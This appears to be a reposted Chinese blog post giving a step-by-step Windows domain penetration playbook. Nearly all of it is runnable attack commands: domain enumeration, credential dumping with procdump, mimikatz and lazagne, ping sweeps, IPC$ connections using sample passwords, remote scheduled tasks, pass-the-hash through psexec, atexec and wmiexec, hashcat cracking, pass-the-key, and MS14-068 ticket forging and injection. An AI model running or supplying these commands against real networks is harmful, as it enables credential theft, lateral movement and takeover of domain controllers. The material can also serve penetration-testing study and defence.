标签： administrator hash 主机 192.168 密码 220.131

内网渗透过程：

首先ifconfig /all 看DNS后缀可判断域后缀等信息，然后net time /domain看域控主机时间，这个时候会爆出域控主机名字，ping或者nslook up名字，或域控主机IP地址 .

然后 net user /domain（不加/domian就是看本地用户组）看域用户，这个命令也可以爆出域控主机名字，这里收集到域用户信息后，使用mimikatz，lazagne开始收集密码信息.

其中mimikatz收集域主机用户登录密码信息，这里先使用procdump收集信息然后将dump文件放到本机使用mimikatz跑，lazagne主要收集用户在电脑上保存过的信息.

这里将收集到的用户名，密码收集下来，然后探测内网存活主机，工具可以使用nbscan（扫出来后面带dc就是域控主机）.另外也可以换一种命令来探测内网存活主机

命令：for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr “TTL=”  （使用命令好的是不用对工具做免杀，不好的是也会扫到其他网络设备）.

扫出来ip后，利用密码，尝试建立ipc连接   命令：net use \\192.168.220.131\ipc$ "123456Ly" /user:liu.com\administrator  连接成功会提示命令成功完成.

连接成功后就可以执行计划任务了，其中小于windows2012使用at，大于windows2012使用schtasks.，先使用copy add.bat \\192.168.220.131\c$,将add.bat复制到

被害主机c盘，win2012之前系统  at \\192.168.220.130 20:55 c:\add.bat  ，win 2012之后 schtasks /create /s 192.168.220.131 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F  运行 schtasks /run /s 192.168.220.131 /tn adduser..   at   schtasks  需要知道明文密码.

其中使用atexec.exe工具可以密文hash连接，连接口令  atexec.exe -hashes :ccef208c54654564564654564654 ./administrator@198.168.220.130 "whoami"

当然通过收集到的ip 用户和密码一个一个的尝试很浪费时间

以上都是通过循环一个变量，当然也可以自己写python配置多个变量，但是条件是对方电脑有python环境.

win2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码，2012以下打了补丁也无法获取明文密码.解决办法

1.使用工具hashcat暴力破解 hashcat -a 0 -m 1000 hash file --force

2.psexec  也可以通过hash传递远程执行   #相对于atexec比较好，第一不用免杀，第二可以直接连接，第三是全自动.

明文 psexec \\192.168.220.131 -u administrator -p 123456Ly -s cmd

hash psexec -hashes : sadsadasdsadsad ./administrator@192.168.220.131   # sadsadasdsadsad为hash值

3.WMI通过135端口服务利用  #不会留下痕迹  自带cscript全自动调用cmd需要利用wmiexec.vbs(不会被杀).明文没有密文

cscript //nologo wmiexec.vbs /shell 192.168.220.131 administrator 123456ly

4.wmiexec明文或hash 有回显exe

wmiexec -hashes :asdsdsadsadsad ./administrator@192.168.220.131 "whoami"   #asdsdsadsadsad为hash值

 

PTH：ntml的值（2003之前是LM）  PTT：利用票据凭证TGT（相当于cookie） PTK：利用ekeys aes256进行渗透测试

PTH：获取sekurlsa::logonPasswords     # privilege::debug  

获取ntml保存下来在mimikatz执行如下命令：sekurlsa::pth /user:administrator /domain:liu /ntlm:asdsadasdsadsadas    #asdsadasdsadsadas ntlm值这里是我乱打的

会弹出一个cmd窗口不需要密码直接连接执行命令，dir \\192.168.220.131\c$

如果是本机的话sekurlsa::pth /user:administrator /domain:workgroup /ntlm:asdsadasdsadsadas...如果打了补丁KB2871997只能域administrator连接

PTK:获取sekurlsa::ekeys

如果打了补丁就可以连接所有用户.sekurlsa::pth /user:administrator /domain:workgroup /aes256:asdsadasdsadsadas    #asdsadasdsadsadas aes值这里是我乱打的

PTK：利用协议攻击

第一种利用漏洞：能实现普通用户直接获取域控system权限

1.cmd使用whoami/user命令获取sid为 S-1-5-21-1477929284-1972872092-2968262907-500

2.清空机器中凭证，直接使用mimikatz执行命令kerberos::list    和    kerberos::ptc   

3.利用ms14-068生成TGT数据    ms14-068.exe -u 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码

4.票据注入内存

mimikatz.exe直接这些 kerberos::ptc TGT_liuyang@liu.com.ccache    dir \\WIN-TOR4BO6GFKC\c$

 

标签：,administrator,hash,主机,192.168,密码,220.131
来源： https://www.cnblogs.com/Pojian/p/15983327.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。